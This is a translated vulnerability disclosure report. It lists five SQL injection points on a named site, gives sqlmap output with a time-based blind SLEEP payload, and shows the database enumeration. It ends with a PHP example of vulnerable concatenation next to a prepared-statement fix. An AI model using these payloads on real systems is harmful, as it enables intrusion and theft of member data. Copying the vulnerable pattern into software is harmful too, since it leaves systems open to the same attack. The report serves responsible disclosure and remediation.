2015-05-30: Details reported to the vendor; awaiting vendor handling
2015-06-01: Vendor confirmed; details disclosed to the vendor only
2015-06-11: Details disclosed to core white hats and relevant domain experts
2015-06-21: Details disclosed to regular white hats
2015-07-01: Details disclosed to intern white hats
2015-07-16: Details disclosed to the public
SQL injection bundle

SQL injection points

Injection point 1:
http://xy.linkong.com/activity/love_code/_ajax.html.php?option=*&qid=1011&timeStame=1432905762461n62363&types=1
The option parameter is vulnerable to SQL injection.

Injection point 2:
http://xy.linkong.com/picture.php?page=2&sort_id=*
The sort_id parameter is vulnerable to SQL injection.

Injection point 3:
http://xy.linkong.com/xml/bcastr.php?num=5&sort_id=*
The sort_id parameter is vulnerable to SQL injection.

Injection point 4:
http://xy.linkong.com/xml/common.php?num=5&sort_id=*
The sort_id parameter is vulnerable to SQL injection.

Injection point 5:
http://xy.linkong.com/wallpaper.php?page=2&sort_id=*
The sort_id parameter is vulnerable to SQL injection.

sqlmap proof (note the options used: level=5 --no-cast):
sqlmap identified the following injection points with a total of 2367 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://xy.linekong.com:80/activity/love_code/_ajax.html.php?option='||(SELECT 'xEzN' FROM DUAL WHERE 8847=8847 AND SLEEP(5))||'&qid=1011&timeStame=1432905762461n62363&types=1
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
web application technology: Apache
back-end DBMS: MySQL 5
current user is DBA: False
available databases [2]:
[*] information_schema
[*] xy_web
Database: xy_web [234 tables]
Database: xy_web, Table: xy_member [26 columns]
Database: xy_web, Table: xy_member [12 entries]
Fix suggestion: parameter filtering
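As an added example (not code from the report or from the affected site), the string-concatenation pattern that makes a parameter such as sort_id injectable, beside a hardened handler that validates types at the edge and binds values through PDO prepared statements. The table name pictures, the option whitelist values and all function names are hypothetical.

```php
<?php
// Added example, not code from the report or the affected site. Handlers are
// modelled on picture.php?page=2&sort_id=* ; table "pictures" is hypothetical.

// BEFORE: request values are spliced straight into the statement, so a
// time-based payload of the shape sqlmap reported (quote, ||, SLEEP) becomes
// part of the SQL and the server's response time leaks one bit per request.
function listPicturesVulnerable(mysqli $db, array $get)
{
    $sortId = $get['sort_id'] ?? '0';
    $page   = (int) ($get['page'] ?? 1);
    $offset = ($page - 1) * 20;
    $sql = "SELECT id, title FROM pictures WHERE sort_id = '$sortId' "
         . "ORDER BY id DESC LIMIT $offset, 20";
    return $db->query($sql);
}

// AFTER: server-side prepares, so bound values never enter the SQL text
// (also lets LIMIT placeholders be bound as integers without emulation quirks).
function connectDb(string $dsn, string $user, string $pass): PDO
{
    return new PDO($dsn, $user, $pass, [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false,
    ]);
}

// Integer parameters (sort_id, page, num): accept only a well-formed integer
// in a sane range; anything else is rejected outright rather than "cleaned".
function intParam(array $get, string $name, int $min, int $max, ?int $default = null): ?int
{
    $raw = $get[$name] ?? $default;
    $v = filter_var($raw, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => $min, 'max_range' => $max]]);
    return $v === false ? null : $v;
}

// Enumerated string parameters (option=... in _ajax.html.php): compare against
// a fixed whitelist of known values; the raw string never reaches a query.
function optionParam(array $get, array $allowed): ?string
{
    $raw = $get['option'] ?? '';
    return in_array($raw, $allowed, true) ? $raw : null;
}

function listPicturesSafe(PDO $db, array $get): array
{
    $sortId = intParam($get, 'sort_id', 1, 2147483647);
    $page   = intParam($get, 'page', 1, 10000, 1);
    if ($sortId === null || $page === null) {
        http_response_code(400);   // reject, do not guess
        return [];
    }
    $stmt = $db->prepare('SELECT id, title FROM pictures WHERE sort_id = :sort_id '
                       . 'ORDER BY id DESC LIMIT :offset, 20');
    $stmt->bindValue(':sort_id', $sortId, PDO::PARAM_INT);
    $stmt->bindValue(':offset', ($page - 1) * 20, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}
```

The same two helpers cover the other four points on the page: num, page and sort_id go through intParam, and option through optionParam with the endpoint's real set of allowed values.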
Severity: High
Vulnerability Rank: 11
Confirmed: 2015-06-01 11:10
Vendor reply: Thank you for pointing out the issue; relevant staff have been assigned to handle it.
Latest status: None